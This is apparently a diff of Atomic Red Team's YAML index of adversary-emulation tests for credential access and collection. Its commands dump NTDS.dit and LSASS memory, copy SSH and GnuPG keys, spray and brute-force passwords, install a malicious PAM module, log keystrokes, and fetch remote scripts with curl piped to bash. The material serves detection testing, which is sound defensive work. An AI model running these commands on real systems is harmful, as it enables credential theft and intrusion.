+' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vssadmin''" to fulfill this requirement - ' +' - description: 'Extract path must exist - ' +' prereq_command: 'if not exist #{extract_path} (exit /b 1) - ' +' get_prereq_command: 'mkdir #{extract_path} - ' +' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit @@ -4256,22 +4256,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI @@ -4290,19 +4290,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy remotely with WMI @@ -4325,18 +4325,18 @@ credential-access: - description: 'Target must be a reachable Domain Controller, and current context must be domain admin - ' +' prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief - ' +' get_prereq_command: 'echo Sorry, can''t connect to target host, check: network, firewall or permissions (must be admin on target) - ' +' executor: command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell @@ -4500,11 +4500,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4530,11 +4530,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4577,14 +4577,14 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - ' +' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. - ' +' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -4592,7 +4592,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - ' +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -4759,10 +4759,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) - ' +' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" @@ -4827,7 +4827,7 @@ credential-access: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1110.002: @@ -4995,7 +4995,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -5008,14 +5008,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -5107,7 +5107,7 @@ credential-access: description: 'Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller - ' +' supported_platforms: - windows input_arguments: @@ -5130,7 +5130,7 @@ credential-access: description: 'Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos - ' +' supported_platforms: - windows input_arguments: @@ -5180,7 +5180,7 @@ credential-access: auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 description: 'Attempt to brute force Azure AD user via AzureAD powershell module. - ' +' supported_platforms: - azure-ad input_arguments: @@ -5197,14 +5197,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: name: powershell elevation_required: false @@ -5236,7 +5236,7 @@ credential-access: dependencies: - description: 'Check if running on a Debian based machine. - ' +' prereq_command: | if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi @@ -5244,7 +5244,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'apt-get update && apt-get install -y openssl sudo - ' +' executor: elevation_required: true command: | @@ -5267,7 +5267,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target - ' +' name: sh - name: SUDO brute force Redhat auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade @@ -5279,7 +5279,7 @@ credential-access: dependencies: - description: 'Check if running on a Redhat based machine. - ' +' prereq_command: | if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi @@ -5287,7 +5287,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'yum -y update && yum install -y openssl sudo - ' +' executor: elevation_required: true command: | @@ -5310,7 +5310,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target - ' +' name: sh T1555.005: technique: @@ -5476,13 +5476,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt - ' +' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) - ' +' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat - ' +' executor: name: command_prompt elevation_required: false @@ -5490,7 +5490,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL - ' +' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -5589,14 +5589,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: name: powershell elevation_required: false @@ -5716,10 +5716,10 @@ credential-access: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -5753,35 +5753,35 @@ credential-access: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1552.004: technique: id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf @@ -5856,14 +5856,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key - ' +' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. - ' +' supported_platforms: - macos - linux @@ -5879,17 +5879,17 @@ credential-access: executor: command: 'find #{search_path} -name id_rsa >> #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. - ' +' supported_platforms: - linux input_arguments: @@ -5907,14 +5907,14 @@ credential-access: find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} - ' +' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. - ' +' supported_platforms: - macos - linux @@ -5933,14 +5933,14 @@ credential-access: find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} - ' +' name: sh - name: Copy the users GnuPG directory with rsync auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. - ' +' supported_platforms: - macos - linux @@ -5959,7 +5959,7 @@ credential-access: find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} - ' +' name: sh - name: ADFS token signing and encryption certificates theft - Local auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f @@ -5972,13 +5972,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. - ' +' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: | Import-Module AADInternals -Force @@ -6018,14 +6018,14 @@ credential-access: dependencies: - description: 'AADInternals and ActiveDirectory modules must be installed. - ' +' prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc @@ -6120,7 +6120,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist - ' +' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6141,7 +6141,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" - ' +' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | @@ -6169,7 +6169,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist - ' +' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6178,11 +6178,11 @@ credential-access: echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: 'Requires Python - ' +' prereq_command: "(which python || which python3 || which python2)\n" get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" - ' +' executor: name: sh elevation_required: true @@ -6194,7 +6194,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" - ' +' T1606.002: technique: external_references: @@ -6289,13 +6289,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. - ' +' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: | Import-Module AADInternals -Force @@ -6383,42 +6383,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials - ' +' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'pypykatz must be installed and part of PATH - ' +' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz - ' +' executor: command: 'pypykatz live registry - ' +' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -6444,12 +6444,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} - ' +' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 - ' +' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. @@ -6501,7 +6501,7 @@ credential-access: auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: 'Dump hives from volume shadow copies with System.IO.File - ' +' supported_platforms: - windows input_arguments: @@ -7315,7 +7315,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} - ' +' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: @@ -7411,7 +7411,7 @@ collection: auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 description: 'Uses GZip from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7427,10 +7427,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7438,15 +7438,15 @@ collection: command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'', ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using bz2 in Python (Linux) auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d description: 'Uses bz2 from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7462,25 +7462,25 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash elevation_required: false command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using zipfile in Python (Linux) auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 description: 'Uses zipfile from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7496,10 +7496,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7507,15 +7507,15 @@ collection: command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'', mode=''w'').write(''#{path_to_input_file}'')" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using tarfile in Python (Linux) auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db description: 'Uses tarfile from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7531,10 +7531,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7543,7 +7543,7 @@ collection: mode='w').write('#{path_to_input_file}')\" \n" cleanup_command: 'rm #{path_to_output_file} - ' +' T1560.001: technique: created: '2020-02-20T21:01:25.428Z' @@ -7626,10 +7626,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) - ' +' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7639,10 +7639,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} - ' +' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - ' +' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | @@ -7662,10 +7662,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) - ' +' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7703,11 +7703,11 @@ collection: dependencies: - description: 'Winzip must be installed - ' +' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' - ' +' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -7727,7 +7727,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation - ' +' supported_platforms: - windows input_arguments: @@ -7742,10 +7742,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) - ' +' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -7764,7 +7764,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. - ' +' supported_platforms: - linux - macos @@ -7781,11 +7781,11 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) - ' +' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip) echo Please set input_files argument to include files that exist @@ -7794,16 +7794,16 @@ collection: elevation_required: false command: 'zip #{output_file} #{input_files} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - ' +' supported_platforms: - linux - macos @@ -7823,16 +7823,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) - ' +' cleanup_command: 'rm -f #{input_file}.gz - ' +' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - ' +' supported_platforms: - linux - macos @@ -7848,28 +7848,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) - ' +' prereq_command: 'test -e #{input_file_folder} - ' +' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists - ' +' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration - ' +' supported_platforms: - macos - linux @@ -7892,7 +7892,7 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" executor: @@ -7906,7 +7906,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} - ' +' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -7956,7 +7956,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet - ' +' name: powershell T1119: technique: @@ -8026,7 +8026,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1 - ' +' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -8042,7 +8042,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null - ' +' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 @@ -8131,7 +8131,7 @@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. - ' +' supported_platforms: - windows executor: @@ -8141,14 +8141,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 - ' +' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it - ' +' supported_platforms: - windows executor: @@ -8171,7 +8171,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt - ' +' supported_platforms: - windows input_arguments: @@ -8183,7 +8183,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -8194,7 +8194,7 @@ collection: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -8204,7 +8204,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore - ' +' name: powershell T1213.001: technique: @@ -8354,7 +8354,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -8370,10 +8370,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -8926,7 +8926,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' - ' +' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -9097,7 +9097,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -9116,14 +9116,14 @@ collection: dependencies: - description: 'Checking if pam_tty_audit.so is installed - ' +' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' - ' +' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" - ' +' supported_platforms: - linux executor: @@ -9154,14 +9154,14 @@ collection: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. - ' +' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -9171,7 +9171,7 @@ collection: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND - ' +' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -9188,14 +9188,14 @@ collection: dependencies: - description: 'This test requires to be run in a bash shell - ' +' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' input_arguments: output_file: name: output_file @@ -9211,7 +9211,7 @@ collection: cat #{output_file} cleanup_command: 'rm #{output_file} - ' +' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. @@ -9219,20 +9219,20 @@ collection: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' input_arguments: user_account: description: Basic ssh user account for testing. @@ -9246,7 +9246,7 @@ collection: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ - ' +' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -9258,14 +9258,14 @@ collection: dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -9274,7 +9274,7 @@ collection: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd - ' +' T1557.001: technique: external_references: @@ -9448,17 +9448,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} - ' +' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore - ' +' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script - ' +' supported_platforms: - linux - macos @@ -9471,7 +9471,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} - ' +' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -9493,10 +9493,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force - ' +' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore - ' +' name: powershell T1114.001: technique: @@ -9567,23 +9567,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" - ' +' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} - ' +' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore - ' +' name: powershell T1185: technique: @@ -9923,7 +9923,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) - ' +' name: Screen Capture 